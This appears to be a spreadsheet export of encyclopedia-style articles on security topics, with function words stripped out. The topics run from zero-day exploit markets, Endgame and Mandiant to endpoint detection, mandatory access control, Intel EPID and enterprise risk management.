differentiate white markets, gray markets black markets. white markets original developers reward security researchers reporting vulnerabilities. average, prices reported 2014 less thousands dollars special offers $100,000 made certain vulnerabilities based type, criticality, nature affected software. fourteen percent microsoft, apple adobe vulnerabilities past years came white market programs.criminals black market; however, governments occasional buyers offer satisfied gray market find impediments acquire zero-days international regulations. hacking team states website sell products governments countries blacklisted u.s., nato asean", although found infringing policy. prices usually 10–100 times higher market compared white market changes depending location buyer; united states place best prices offered. potential sellers allowed sell specific territories, like cuba north korea case u.s., likely operate black market well. gray markets buyers include clients private sector, governments brokers resell vulnerabilities. information regarding markets available requests confidential information governments, price usually redacted safety purposes, information leaked national security agencies private companies (i.e. finfisher hacking team). tsyrklevich reported transactions made hacking team. date, represents best evidence available inner workings gray market. however, likely case procedures applied white black markets well: buyers follow standard technology purchasing practices around testing, delivery, acceptance. warranty requirements negotiations become necessary purchasing product intrinsically predicated existence information asymmetry buyer seller. requirements—like targeted software configurations—are important negotiate ahead time adding support targets might impossible worth effort. likewise warranty provisions buyers common minimize risk parceling payments time frame terminating payments early vulnerability patched time frame complete. payments typically made 0day exploit delivered tested requirements, necessitating sellers trust buyers good faith. similarly, buyers purchasing exploits must trust sellers expose vulnerability share others sold exclusive basis. controversies typically parties opposed gray markets retailers item market damages profits reputation. result, usually pressure original manufacturer adjust official channels distribution. state also plays important role enforcing penalties case infringement. however, zero-day exploit market atypical operates closer workings black market. brokers bounty programs, could seen retailers zero-days, control whatsoever original producers "bad" independently discovered different, often anonymous, actors. interest change channel distribution profit white gray markets, much less risk former. states, usually complement labour original manufacturers restrict gray markets, play different role zero-day market regular purchasers exploits. given secretive nature information security, interest disclose information software vulnerabilities interest case, aligned criminals seek infiltrate devices acquire information specific targets. argued presence intelligence agencies consumers "bad" could increase price zero-days even legitimate markets provide bargaining power black-market sellers.finally, private companies unwilling raise prices rewards levels reached gray black markets arguing sustainable defensive markets. previous studies shown reward programs cost-effective private firms compared hiring in-house security researchers, prize rewards keeps increasing might case anymore. 2015, zerodium, start-up focused acquisition "high-risk vulnerabilities", announced bounty program. they published formats required vulnerability submissions, criteria determine prices—the popularity complexity affected software, quality submitted exploit—and prices themselves. this represents mixture transparency offered traditional vulnerability reward program high rewards offered gray black markets. software developer companies perceived approach threat, primarily fact high bounties could cause developer tester employees leave jobs. effects market, however, defined. criticized buying stockpiling zero-day vulnerabilities, keeping secret developing mainly offensive capabilities instead helping patch vulnerabilities. also bounty program cybercrime cybercrime countermeasures cyber-arms industry duqu mass surveillance industry stuxnet surveillance capitalism proactive cyber defense references</t>
  </si>
  <si>
    <t>Endgame, Inc.</t>
  </si>
  <si>
    <t>endgame provides cyber operations platform supporting detection, exploitation, mitigation cyber-threats. endgame started executives (internet security systems). history endgame started 2008 chris rouland executives previously worked iss. october 2010 investment million usd, raised bessemer ventures, columbia capital, kleiner perkins caufield byers (kpcb), techoperators. company offers commercial web-based malware detection services, defensive digital security intelligence data analysis software.in february 2011, company announced partnerships hewlett-packard endgame's reputation intelligence service within hp's tippingpoint digital vaccine service ibm's managed services offerings. that month emails sent gary endgame leaked revealed company sold zero-day vulnerabilities. 2014 endgame moved away zero-day exploitations identifying protecting consumers potential cyber threats. endgame offers services companies within financial services industry consumer technology companies. through software company collects information data sources accessed consumers, identifying potential security threats.in december 2012, endgame announced appointment nathaniel fick chief executive officer, replacing chris rouland. former marine author bestseller bullet away, fick previously center american security, independent nonpartisan national security defense policy research institution, remains operating partner bessemer venture partners.in march 2013, endgame closed million series equity financing stated purpose fund growth existing federal customer base well expand commercial market. round investor paladin capital group, multi-stage private equity firm, included participation existing investors bessemer venture partners, columbia capital, kleiner perkins caufield byers, techoperators.endgame initially became known providing cyber intelligence agencies national security agency 2013 expanded financial commercial clients within private sector, raising additional million funding investment edgemore capital, tier capital partners savano capital partners. endgame offers defensive analytics company's network servers data exploits.endgame acquired onyxware 2014, florida-based mobile security technology company provides applications detecting third-party network threats. november 2014 endgame claims approximately employees.on october 8th, 2019, elastic n.v. (nyse: estc), company behind elasticsearch elastic stack, announced completed acquisition endgame. leadership endgame board directors christopher darby, president in-q-tel, independent strategic investment firm supporting missions intelligence community. endgame announced march 2013 kenneth minihan, former director national security agency managing director paladin, also joined board directors. april 2014 james miller, former under secretary defense policy appointed board advisers. niloofar howe appointed chief strategy officer jamie butler serves chief scientist. brody senior vice president marketing tosh vice president engineering. references external links business week company summary</t>
  </si>
  <si>
    <t>Endpoint detection and response</t>
  </si>
  <si>
    <t>endpoint detection response (edr), also known endpoint threat detection response (etdr), cybersecurity technology continually monitors "endpoint" (e.g. mobile phone, laptop, internet-of-things device) mitigate malicious cyber threats. history 2013, anton chuvakin gartner coined term "endpoint threat detection response" "tools primarily focused detecting investigating suspicious activities (and traces such) problems hosts/endpoints". now, commonly known "endpoint detection response". according endpoint detection response global market outlook (2017-2026) report, adoption cloud-based on-premises solutions going grow annually, valued $7273.26 million 2026. according artificial intelligence (ai) cyber security market report zion market research, role machine learning artificial intelligence create $30.9 billion cyber security market 2025.in 2020, source code widely-used tool made available comodo cybersecurity openedr. commons clause license applied makes available free trustworthy, explicitly claim meet commercial reuse requirements open-source. concept endpoint detection response technology used identify suspicious behavior advanced persistent threats endpoints environment, alert administrators accordingly. collecting aggregating data endpoints sources. that data enriched additional cloud analysis. solutions primarily alerting tool rather protection layer functions combined depending vendor. data stored centralized database forwarded siem tool. every platform unique capabilities. however, common capabilities include monitoring endpoints online offline mode, responding threats real-time, increasing visibility transparency user data, detecting stored endpoint events malware injections, creating blacklists whitelist, integration technologies. some vendors technologies leverage free mitre att&amp;ck classification framework threats. also endpoint security data loss prevention software references</t>
  </si>
  <si>
    <t>Endpoint security</t>
  </si>
  <si>
    <t>endpoint security endpoint protection approach protection computer networks remotely bridged client devices. connection endpoint devices laptops, tablets, mobile phones, internet-of-things devices, wireless devices corporate networks creates attack paths security threats. endpoint security attempts ensure devices follow definite level compliance standards.the endpoint security space evolved 2010s away limited antivirus software advanced, comprehensive defense. this includes next-generation antivirus, threat detection, investigation, response, device management, data leak protection (dlp), considerations face evolving threats. corporate network security endpoint security management software approach helps identify manage users' computer data access corporate network. this allows network administrator restrict sensitive data well certain website access specific users, maintain, comply organization's policies standards. components involved aligning endpoint security management systems include virtual private network (vpn) client, operating system updated endpoint agent. computer devices compliance organization's policy provisioned limited access virtual lan. encrypting data endpoints, removable storage devices help protect data leaks. client server model endpoint security systems operate client-server model, security program controlled centrally managed host server pinned client program installed network drives. there another model called software service (saas), security programs host server maintained remotely merchant. payment card industry, contribution delivery models server program verifies authenticates user login credentials performs device scan check complies designated corporate security standards prior permitting network access.in addition protecting organization's endpoints potential threats, endpoint security allows admins monitor operation functions data backup strategies. endpoint protection platforms endpoint protection platform (epp) solution deployed endpoint devices prevent file-based malware attacks, detect malicious activity, provide investigation remediation capabilities needed respond dynamic security incidents alerts. several vendors produce systems converging systems endpoint detection response (edr) platforms systems focused threat detection, response, unified monitoring. also network security internet security references</t>
  </si>
  <si>
    <t>Mantrap (access control)</t>
  </si>
  <si>
    <t>mantrap,security mantrap portal, airlock, sally port access control vestibule physical security access control system comprising small space sets interlocking doors, first doors must close second opens. airlocks similar design, allowing free ingress egress also restricting airflow. manual mantrap, guard locks unlocks door sequence. intercom and/or video camera often used allow guard control trap remote location. automatic mantrap, identification required door, sometimes even different measures door. example, open first door, personal identification number entered number opens second. other methods opening doors include proximity cards biometric devices fingerprint readers iris recognition scans. time flight sensors used high security environments. metal detectors often built prevent entrance people carrying weapons. this particularly frequent banks jewelry shops. turnkey, installed systems provided suppliers need technically trained installers. fire codes require automatic mantraps allow exit intermediate space denying access secure space data center research lab. manually-operated mantrap allow guard lock doors, trapping suspect doors questioning detainment. also access control security mantrap (snare) sally port optical turnstile references external links "frequently asked questions". kouba systems. archived original july 2012. retrieved july 2012.</t>
  </si>
  <si>
    <t>SOAtest</t>
  </si>
  <si>
    <t>parasoft soatest testing analysis tool suite testing validating apis api-driven applications (e.g., cloud, mobile apps, soa). basic testing functionality include functional unit testing, integration testing, regression testing, system testing, security testing, simulation mocking, runtime error detection, testing, interoperability testing, ws-* compliance testing, load testing.supported technologies include services, rest, json, jms, tibco, http, xml, edi, mainframes, custom message formats.parasoft soatest introduced service virtualization server emulation stubs 2002; 2007, provided intelligent stubs platform emulated behavior dependent services otherwise difficult access configure development testing. extended service virtualization functionality parasoft virtualize, soatest provides intelligent stubbing. soatest used organizations cisco, ibm, fidelity, bloomberg, vanguard, at&amp;t, irs, cdc, tata consultancy services, comcast sabre.it recognized leader forrester research's forrester wave™: modern application functional test automation tools, 2016, evaluated functional test automation tool vendors across criteria. forrester research gave soatest highest score among vendors current offering category, citing strength testing, automation, integrations. also part solution recognized "innovation technology leader" voke's service virtualization market mover array.soatest recognized leader forrester 2018 forrester wave omnichannel functional test tools. report said "parasoft shined evaluation specifically around effective test maintenance, strong ci/cd application lifecycle management (alm) platform integration".in 2018 soatest award "best devops apis" 2018 awards api:world. references external links parasoft soatest. testing (solution featuring parasoft soatest) service virtualization (related service virtualization product)</t>
  </si>
  <si>
    <t>Enhanced privacy ID</t>
  </si>
  <si>
    <t>enhanced privacy (epid) intel corporation's recommended algorithm attestation trusted system preserving privacy. incorporated several intel chipsets since 2008 intel processors since 2011. rsac 2016 intel disclosed shipped 2.4b epid keys since 2008. epid complies international standards iso/iec 20008 20009, trusted computing group (tcg) authentication. intel contributed epid intellectual property iso/iec rand-z terms. intel recommending epid become standard across industry authentication devices internet things (iot) december 2014 announced licensing technology third-party chip makers broadly enable use. epid epid enhancement direct anonymous attestation (daa) algorithm. digital signature algorithm supporting anonymity. unlike traditional digital signature algorithms, entity unique public verification unique private signature key, provides common group public verification associated many (typically millions) unique private signature keys. created device could prove external party kind device (and optionally software running device) without needing provide device identity, i.e., prove authentic member group without revealing member. epid enhances providing additional utility able revoke private given signature created key, even still unknown. background 1999 pentium added processor serial number (psn) create identity security endpoints internet. however, privacy advocates especially concerned intel chose remove feature later versions. building improving asymmetric cryptography time group keys, intel labs researched standardized benefits preserving privacy. roles there three roles using epid: issuer, member verifier. issuer entity issues unique epid private keys member group. member entity trying prove membership group. verifier entity checking epid signature establish whether signed entity device authentic member group. current usage intel intel generation facility issuer, intel-based embedded epid member, server (possibly running cloud) verifier behalf party wishes know communicating trusted component device). issuing options issuing epid done directly issuer creating epid delivering securely member, blinded issuer know epid private key. having epid keys embedded devices ship advantage usages epid available inherently devices arrive field. having epid issued using blinded protocol advantage usages, since never question whether issuer knew epid device. option epid device time shipment, prove another issuer valid device issued different epid using blinded issuing protocol. uses recent years epid used attestation applications platforms used protected content streaming financial transactions. also used attestation software guard extensions (sgx), released intel 2015. anticipated epid become prevalent iot, inherent distribution processor chip, optional privacy benefits especially valued. proof part genuine example usage epid prove device genuine device. verifier wishing know part genuine would part sign cryptographic nonce epid key. part would sign nonce also provide proof epid revoked. verifier checking validity signature proof would know part genuine. with epid, proof anonymous unlinkable. content protection epid used attest platform securely stream digital rights management (drm)-protected content minimum level hardware security. intel insider program uses epid platform attestation rights-holder. securing financial transactions data protection technology (dpt) transactions product 2-way authentication point sale (pos) terminal backend server based epid keys. using hardware roots trust based epid authentication, initial activation provisioning terminal securely performed remote server. general, epid used basis securely provision cryptographic material wire method. internet things attestation securing iot, epid used provide authentication also preserving privacy. epid keys placed devices manufacturing ideal provisioning keys services device. epid keys used devices services allowing users tracked devices using services. required, known transaction used application user choose require) transaction unambiguously known (e.g., financial transaction). epid used persistent identity anonymity. whereas alternative approaches exist persistent identity, difficult convert persistent identity anonymous identity. epid serve requirements enable anonymous identity mode operation enables persistence, well. thus, epid ideal broad range anticipated uses. security privacy foundational iot. since security privacy extend beyond intel processors chipmaker's processors sensors, intel announced december 2014 intent license epid broadly chip manufacturers internet things applications. august 2015, intel jointly announced licensing epid microchip atmel, showed running microchip microcontroller intel developers forum. internet things complexity hiding internet things described "network networks" internal workings network appropriate disclose peer foreign network. example, case involving redundant spare devices facilitates availability serviceability objectives, network operations load balances replaces different devices need reflected peer foreign networks "share" device across network contexts. peer expects particular type service data structure likely need know device failover, replacement repair. epid used share common public certificate describes attests group similar devices used redundancy availability, allow tracking specific device movements. many cases, peer networks want track movements would require, potentially, maintaining context involving multiple certificates device lifecycles. where privacy also consideration, details device maintenance, failover, load balancing replacement cannot inferred tracking authentication events. internet things secure device onboard because epid's privacy preserving properties, ideal device identity allow device securely automatically onboard service immediately first power device. essentially device performs secure boot, anything else, reaches across internet find service owner chosen managing device. epid attestation integral initial communication. consequence epid attestation, secure channel created device service. because epid attestation, service knows talking real device. (using secure channel created, reciprocal attestation device knows talking service owner selected manage it.) unlike pki, unchanging transaction transaction, adversary lurking network cannot correlate traffic used epid employed. thus privacy onboarding preserved adversaries longer collect data create attack maps later future device vulnerabilities discovered. moreover, additional keys securely provisioned wire, latest version software, perhaps specific service, downloaded default logins disabled secure device without operator intervention. october 2017, intel announced intel secure device onboard, software solution help device manufacturers cloud services privately, securely quickly onboard devices services. objective onboard "any device platform" "superior onboarding experience ecosystem enablement roi". cases protocols submitted fido alliance working group. also elliptic curve digital signature algorithm elliptical curve cryptography loss internet anonymity privacy enhancing technologies proof knowledge public-key cryptography trusted platform module references external links puri, deepak, "iot security: intel epid simplifies authentication devices," networkworld [1], retrieved october 2016. xiaoyu ruan: “chapter privacy next level: intel’s enhanced privacy identification (epid) technology”, platform embedded security technology revealed. apress media, llc, 2014. ([2]) brickell jiangtao “enhanced privacy bilinear pairing hardware authentication attestation”. ieee international conference social computing ieee international conference privacy, security, risk trust. 2010. (iacr eprint [4]) data protection technology transactions intel microsoft class video epid touch" device onboarding idf'16</t>
  </si>
  <si>
    <t>Mandiant</t>
  </si>
  <si>
    <t>mandiant publicly traded american cybersecurity firm. rose prominence february 2013 released report directly implicating china cyber espionage. december 2013, mandiant acquired fireeye billion, eventually sold fireeye product line, name, employees symphony technology group $1.2 billion june 2021. march 2022, google announced would acquire company $5.4 billion integrate google cloud division. history kevin mandia, former united states force officer serves company's chief executive officer, founded mandiant cliff consulting 2004 rebranding current name 2006. 2011, mandiant received funding kleiner perkins caufield byers expand staff grow business-to-business operations, providing incident response general security consulting along incident management products major global organizations, governments, fortune companies. 2012 revenues $100 million, 2011.mandiant awarded 2012 2013 award exemplary professional leadership information technology security. also creator openioc (open indicators compromise), extensible schema description technical characteristics identify threats, security hackers' methodologies, evidence compromise. february 2013, mandiant released report documenting evidence cyber attacks people's liberation army, specifically pudong-based unit 61398, targeting least organizations united states english-speaking countries extending back 2006. report, mandiant referred espionage unit "apt1".in december 2013, mandiant acquired fireeye billion.in october 2020, company announced mandiant advantage, subscription-based saas platform designed augment automate security response teams combined threat intelligence gathered mandiant data cyber incident response engagements; december, company investigated major supply chain attack solarwinds u.s. government infrastructure.in 2021, mandiant contracted assist response ransomware incident impacting colonial pipeline, fuel pipeline operator supplies close half gasoline, diesel, fuels east coast u.s. june, company spun fireeye part latters's acqusition symphony technology group. august, company acquired intrigue, specialized surface management. march 2022, announced company would acquired google $5.4 billion subsequently integrated google cloud division. references external links official website business data mandiant, inc.:</t>
  </si>
  <si>
    <t>Mandatory access control</t>
  </si>
  <si>
    <t>computer security, mandatory access control (mac) refers type access control operating system database constrains ability subject initiator access generally perform sort operation object target. case operating systems, subject usually process thread; objects constructs files, directories, tcp/udp ports, shared memory segments, devices, etc. subjects objects security attributes. whenever subject attempts access object, authorization rule enforced operating system kernel examines security attributes decides whether access take place. operation subject object tested authorization rules (aka policy) determine operation allowed. database management system, access control mechanism, also apply mandatory access control; case, objects tables, views, procedures, etc. with mandatory access control, security policy centrally controlled security policy administrator; users ability override policy and, example, grant access files would otherwise restricted. contrast, discretionary access control (dac), also governs ability subjects access objects, allows users ability make policy decisions and/or assign security attributes. (the traditional unix system users, groups, read-write-execute permissions example dac.) mac-enabled systems allow policy administrators implement organization-wide security policies. under (and unlike dac), users cannot override modify policy, either accidentally intentionally. this allows security administrators define central policy guaranteed principle) enforced users. historically traditionally, closely associated multilevel security (mls) specialized military systems. context, implies high degree rigor satisfy constraints systems. more recently, however, deviated niche started become mainstream. recent implementations, selinux apparmor linux mandatory integrity control windows, allow administrators focus issues network attacks malware without rigor constraints mls. historical background implications multilevel security historically, strongly associated multilevel security (mls) means protecting classified information. trusted computer system evaluation criteria (tcsec), seminal work subject, provided original definition means restricting access objects based sensitivity represented label) information contained objects formal authorization (i.e., clearance) subjects access information sensitivity". early implementations honeywell's scomp, usaf sacdin, blacker, boeing's focused protect military-oriented security classification levels robust enforcement. term mandatory acquired special meaning derived military systems. context, implies extremely high degree robustness assures control mechanisms resist type subversion, thereby enabling enforce access controls mandated order government executive order 12958 classified information. enforcement supposed imperative commercial applications. this precludes enforcement best-effort mechanisms; mechanisms provide absolute near-absolute enforcement mandate acceptable mac. this tall order sometimes assumed unrealistic unfamiliar high assurance strategies, difficult are. strength degrees systems, users authority decide whether grant access user. allow that, users clearances data. this necessarily true system. individuals processes exist denied access data system environment, system must trusted enforce mac. since various levels data classification user clearances, implies quantified scale robustness. example, robustness indicated system environments containing classified secret information uncleared users secret information users cleared least confidential. promote consistency eliminate subjectivity degrees robustness, extensive scientific analysis risk assessment topic produced landmark benchmark standardization quantifying security robustness capabilities systems mapping degrees trust warranted various security environments. result documented csc-std-004-85. relatively independent components robustness defined: assurance level functionality. both specified degree precision warranted significant confidence certifications based criteria. evaluation common criteria based science intended preserve assurance level levels functionality specifications protection profiles. essential components objective robustness benchmarks, levels faithfully preserved. case, tcsec level (not capable category) fairly faithfully preserved common criteria, controlled access protection profile (capp). multilevel security (mls) protection profiles (such mlsospp similar general they pursuant mls, lack detailed implementation requirements orange book predecessors, focusing objectives. this gives certifiers subjective flexibility deciding whether evaluated product’s technical features adequately achieve objective, potentially eroding consistency evaluated products making easier attain certification less trustworthy products. reasons, importance technical details protection profile critical determining suitability product. such architecture prevents authenticated user process specific classification trust-level accessing information, processes, devices different level. this provides containment mechanism users processes, known unknown unknown program (for example) might comprise untrusted application system monitor and/or control accesses devices files). implementations implementations, unisys' blacker project, certified robust enough separate secret unclassified late last millennium. their underlying technology became obsolete refreshed. today current implementations certified tcsec level robust implementation. however, less robust products exist. amon ott's rsbac (rule based access control) provides framework linux kernels allows several different security policy decision modules. models implemented mandatory access control model. general goal rsbac design reach (obsolete) orange book (tcsec) level. model mandatory access control used rsbac mostly unix system v/mls, version 1.2.1 (developed 1989 national computer security center classification b1/tcsec). rsbac requires patches stock kernel, maintained quite well project owner. research project called selinux added mandatory access control architecture linux kernel, merged mainline version linux august 2003. utilizes linux kernel feature called (linux security modules interface). enterprise linux version (and later versions) come selinux-enabled kernel. although selinux capable restricting processes system, default targeted policy rhel confines vulnerable programs unconfined domain programs run. rhel ships binary policy types: strict, attempts implement least privilege, mls, based strict adds labels. rhel contains additional enhancements received lspp/rbacpp/capp/eal4+ certifications june 2007. tomoyo linux lightweight implementation linux embedded linux, developed data corporation. merged linux kernel mainline version 2.6.30 june 2009. differently label-based approach used selinux, tomoyo linux performs pathname-based mandatory access control, separating security domains according process invocation history, describes system behavior. policy described terms pathnames. security domain simply defined process call chain, represented string. there modes: disabled, learning, permissive, enforcing. administrators assign different modes different domains. tomoyo linux introduced "learning" mode, accesses occurred kernel automatically analyzed stored generate policy: mode could first step policy writing, making easy customize later. suse linux ubuntu 7.10 added implementation called apparmor. apparmor utilizes linux kernel feature called (linux security modules interface). provides kernel allows modules kernel code govern (dac acl, access-control lists). apparmor capable restricting programs optionally linux kernel version 2.6.36. linux many unix distributions (multi-ring), disk, memory; software manage privileges well, linux became famous 1990s secure stable non-unix alternatives. linux distributors disable best devices although true consumer electronics available today. grsecurity patch linux kernel providing implementation (precisely, rbac implementation). grsecurity implemented api. microsoft starting windows vista server 2008 windows incorporates mandatory integrity control, adds integrity levels (il) processes running login session. restricts access permissions applications running user account less trustworthy. five integrity levels defined: low, medium, high, system, trusted installer. processes started regular user gain medium elevated processes high while processes inherit integrity level process spawned integrity level customized per-process basis: e.g. downloaded executables windows controls access objects based ils, well defining boundary window messages user interface privilege isolation. named objects, including files, registry keys processes threads, entry governing access defines minimum process object. enforces process write delete object equal higher object’s furthermore, prevent access sensitive data memory, processes can’t open processes higher read access. freebsd supports mandatory access control, implemented part trustedbsd project. introduced freebsd 5.0. since freebsd 7.2, support enabled default. framework extensible; various modules implement policies biba multilevel security. sun's trusted solaris uses mandatory system-enforced access control mechanism (mac), clearances labels used enforce security policy. however note capability manage labels imply kernel strength operate multilevel security mode. access labels control mechanisms robustly protected corruption protected domain maintained kernel. applications user runs combined security label user works session. access information, programs devices weakly controlled. apple's framework implementation trustedbsd framework. limited high-level sandboxing interface provided command-line function sandbox_init. sandbox_init manual page documentation. oracle label security implementation mandatory access control oracle dbms. se-postgresql work progress 2008-01-27, providing integration se-linux. aims integration version 8.4, together row-level restrictions. trusted rubix mandatory access control enforcing dbms fully integrates se-linux restrict access database objects. astra linux developed russian army mandatory access control. smack (simplified mandatory access control kernel) linux kernel security module protects data process interaction malicious manipulation using custom mandatory access control rules, simplicity main design goal. officially merged since linux 2.6.25 release. zeromac written peter gabor gyulay linux kernel patch. also footnotes references loscocco, smalley, muckelbauer, taylor, turner, farrell. inevitability failure: flawed assumption security modern computing environments. proceedings 21st national information systems security conference, pages 303–314, oct. 1998. loscocco, smalley, meeting critical security objectives security-enhanced linux proceedings 2001 ottawa linux symposium. iso/iec 10181-3, information technology, security model, security frameworks, part access control, 1993 robert watson. decade access-control extensibility". commun. (february 2013), 52–63. external links weblog post virtualization used implement mandatory access control. weblog post microsoft employee detailing mandatory integrity control differs implementations. formal security policy model separation kernel formal security policy, david greve, matthew wilding, mark vanfleet.</t>
  </si>
  <si>
    <t>Enterprise Privacy Authorization Language</t>
  </si>
  <si>
    <t>enterprise privacy authorization language (epal) formal language writing enterprise privacy policies govern data handling practices systems according fine-grained positive negative authorization rights. submitted world wide consortium (w3c) 2003 considered recommendation. 2004, lawsuit filed zero-knowledge systems claiming breached copyright agreement worked together 2001 2002 create privacy rights markup language (prml). epal based prml, means zero-knowledge argued co-owner standard. also xacml extensible access control markup language, standard oasis. references epal submission 2003 technology report epal oasis comparison privacy policy languages:epal xacml anne anderson, microsystem laboratories</t>
  </si>
  <si>
    <t>Enterprise information security architecture</t>
  </si>
  <si>
    <t>enterprise information security architecture (zbi) part enterprise architecture focusing information security throughout enterprise. name implies difference exist small/medium-sized businesses larger organizations. overview enterprise information security architecture (eisa) practice applying comprehensive rigorous method describing current and/or future structure behavior organization's security processes, information security systems, personnel, organizational sub-units align organization's core goals strategic direction. although often associated strictly information security technology, relates broadly security practice business optimization addresses business security architecture, performance management, security process architecture well. enterprise information security architecture becoming common practice within financial institutions around globe. primary purpose creating enterprise information security architecture ensure business strategy security aligned. such, enterprise information security architecture allows traceability business strategy underlying technology. enterprise information security architecture topics positioning enterprise information security architecture first formally positioned gartner whitepaper called “incorporating security enterprise architecture process”. this published january 2006. since publication, security architecture moved silo-based architecture enterprise-focused solution incorporates business, information technology. picture represents one-dimensional view enterprise architecture service-oriented architecture. also reflects addition enterprise architecture family called “security”. business architecture, information architecture technology architecture used called short. security part architecture family, become bits. security architectural change imperatives include things like business roadmaps legislative legal requirements technology roadmaps industry trends risk trends visionaries goals provide structure, coherence cohesiveness. must enable business-to-security alignment. defined top-down beginning business strategy. ensure models implementations traced back business strategy, specific business requirements principles. provide abstraction complicating factors, geography technology religion, removed reinstated different levels detail required. establish common "language" information security within organization methodology practice enterprise information security architecture involves developing architecture security framework describe series "current", "intermediate" "target" reference architectures applying align programs change. these frameworks detail organizations, roles, entities relationships exist exist perform business processes. this framework provide rigorous taxonomy ontology clearly identifies processes business performs detailed information processes executed secured. product artifacts describe varying degrees detail exactly business operates security controls required. these artifacts often graphical. given descriptions, whose levels detail vary according affordability practical considerations, decision-makers provided means make informed decisions invest resources, realign organizational goals processes, policies procedures support core missions business functions. strong enterprise information security architecture process helps answer basic questions like: what information security risk posture organization? current architecture supporting adding value security organization? might security architecture modified adds value organization? based know organization wants accomplish future, current security architecture support hinder that?implementing enterprise information security architecture generally starts documenting organization's strategy necessary details operates. process cascades documenting discrete core competencies, business processes, organization interacts external parties customers, suppliers, government entities. having documented organization's strategy structure, architecture process flows discrete information technology components organization charts, activities, process flows organization operates organization cycles, periods timing suppliers technology hardware, software, services applications software inventories diagrams interfaces applications events, messages data flows intranet, extranet, internet, ecommerce, links parties within outside organization data classifications, databases supporting data models hardware, platforms, hosting: servers, network components security devices kept local wide area networks, internet connectivity diagramswherever possible, related explicitly organization's strategy, goals, operations. enterprise information security architecture document current state technical security components listed above, well ideal-world desired future state (reference architecture) finally "target" future state result engineering tradeoffs compromises ideal. essentially result nested interrelated models, usually managed maintained specialised software available market. such exhaustive mapping dependencies notable overlaps metadata general sense, itil concept configuration management database. maintaining accuracy data significant challenge. along models diagrams goes best practices aimed securing adaptability, scalability, manageability etc. these systems engineering best practices unique enterprise information security architecture essential success nonetheless. they involve things componentization, asynchronous communication major components, standardization identifiers successful application enterprise information security architecture requires appropriate positioning organization. analogy city planning often invoked connection instructive. intermediate outcome architecture process comprehensive inventory business security strategy, business security processes, organizational charts, technical security inventories, system interface diagrams, network topologies, explicit relationships them. inventories diagrams merely tools support decision-making. sufficient. must living process. organization must design implement process ensures continual movement current state future state. future state generally combination closing gaps present current organizational strategy ability security dimensions support closing gaps present desired future organization strategy ability security dimensions support necessary upgrades replacements must made security architecture based supplier viability, performance hardware software, capacity issues, known anticipated regulatory requirements, issues driven explicitly organization's functional management. regular basis, current state future state redefined account evolution architecture, changes organizational strategy, purely external factors changes technology customer/vendor/government requirements, changes internal external threat landscapes time. high-level security architecture framework enterprise information security architecture frameworks subset enterprise architecture frameworks. simplify conceptual abstraction enterprise information security architecture within generic framework, picture right would acceptable high-level conceptual security architecture framework. other open enterprise architecture frameworks are: sabsa framework methodology u.s. department defense (dod) architecture framework (dodaf) extended enterprise architecture framework (e2af) institute enterprise architecture developments. federal enterprise architecture united states government (fea) capgemini's integrated architecture framework ministry defence (mod) architecture framework (modaf) enterprise architecture framework open security architecture information assurance enterprise architectural framework (iaeaf) service-oriented modeling framework (somf) open group architecture framework (togaf) zachman framework enterprise cybersecurity (book) relationship disciplines enterprise information security architecture component information security technology governance process organization significant size. more companies implementing formal enterprise security architecture process support governance management however, noted opening paragraph article ideally relates broadly practice business optimization addresses business security architecture, performance management process security architecture well. enterprise information security architecture also related security portfolio management metadata enterprise sense. also enterprise architecture enterprise architecture planning information security information assurance references further reading carbone, (2004). architecture toolkit. enterprise computing series. upper saddle river, prentice hall ptr. cook, (1996). building enterprise information architectures reengineering information systems. hewlett-packard professional books. upper saddle river, prentice hall. fowler, (2003). patterns enterprise application architecture. addison-wesley signature series. boston, addison-wesley. sabsa integration togaf. groot, smits kuipers (2005). method redesign portfolios large organisations", proceedings 38th annual hawaii international conference system sciences (hicss'05). track 223a. ieee. steven spewak hill (1993). enterprise architecture planning developing blueprint data, applications, technology. boston, pub. group. woody, aaron (2013). enterprise security: data-centric approach securing enterprise. birmingham, packt publishing ltd.</t>
  </si>
  <si>
    <t>Enterprise risk management</t>
  </si>
  <si>
    <t>enterprise risk management (erm) business includes methods processes used organizations manage risks seize opportunities related achievement objectives. provides framework risk management, typically involves identifying particular events circumstances relevant organization's objectives (threats opportunities), assessing terms likelihood magnitude impact, determining response strategy, monitoring process. identifying proactively addressing risks opportunities, business enterprises protect create value stakeholders, including owners, employees, customers, regulators, society overall. also described risk-based approach managing enterprise, integrating concepts internal control, sarbanes–oxley act, data protection strategic planning. evolving address needs various stakeholders, want understand broad spectrum risks facing complex organizations ensure appropriately managed. regulators debt rating agencies increased scrutiny risk management processes companies. according thomas stanton johns hopkins university, point enterprise risk management create bureaucracy, facilitate discussion really risks are. frameworks defined there various important frameworks, describes approach identifying, analyzing, responding monitoring risks opportunities, within internal external environment facing enterprise. management selects risk response strategy specific risks identified analyzed, include: avoidance: exiting activities giving rise risk reduction: taking action reduce likelihood impact related risk alternative actions: deciding considering feasible steps minimize risks share insure: transferring sharing portion risk, finance accept: action taken, cost/benefit decisionmonitoring typically performed management part internal control activities, review analytical reports management committee meetings relevant experts, understand risk response strategy working whether objectives achieved. casualty actuarial society framework 2003, casualty actuarial society (cas) defined discipline organization industry assesses, controls, exploits, finances, monitors risks sources purpose increasing organization's short- long-term value stakeholders." conceptualized proceeding across dimensions risk type risk management processes. risk types examples include: hazard risk liability torts, property damage, natural catastrophe financial risk pricing risk, asset risk, currency risk, liquidity risk operational risk customer satisfaction, product failure, integrity, reputational risk; internal poaching; knowledge drain strategic risks competition, social trend, capital availabilitythe risk management process involves: establishing context: this includes understanding current conditions organization operates internal, external risk management context. identifying risks: this includes documentation material threats organization’s achievement objectives representation areas organization exploit competitive advantage. analyzing/quantifying risks: this includes calibration and, possible, creation probability distributions outcomes material risk. integrating risks: this includes aggregation risk distributions, reflecting correlations portfolio effects, formulation results terms impact organization’s performance metrics. assessing/prioritizing risks: this includes determination contribution risk aggregate risk profile, appropriate prioritization. treating/exploiting risks: this includes development strategies controlling exploiting various risks. monitoring reviewing: this includes continual measurement monitoring risk environment performance risk management strategies. coso framework coso "enterprise risk management-integrated framework" published 2004 (new edition coso 2017 mentioned 2004 version outdated) defines "…process, effected entity's board directors, management, personnel, applied strategy setting across enterprise, designed identify potential events affect entity, manage risk within risk appetite, provide reasonable assurance regarding achievement entity objectives."the coso framework eight components four objectives categories. expansion coso internal control-integrated framework published 1992 amended 1994. eight components are: internal environment objective setting event identification risk assessment risk response control activities information communication monitoringthe four objectives categories additional components highlighted are: strategy high-level goals, aligned supporting organization's mission operations effective efficient resources financial reporting reliability operational financial reporting compliance compliance applicable laws regulations 31000: international risk management standard 